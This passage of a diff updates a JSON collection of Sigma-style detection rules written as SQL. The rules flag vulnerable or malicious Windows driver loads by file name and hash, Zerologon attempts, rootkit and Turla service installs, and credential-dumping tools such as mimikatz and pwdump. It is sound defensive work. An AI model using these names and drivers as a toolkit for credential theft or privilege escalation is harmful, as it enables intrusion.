'405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 
'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', 
'4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 
'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 
'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 
'4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', 
'3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": 
"Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes 
LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - 
"title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ 
@@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR 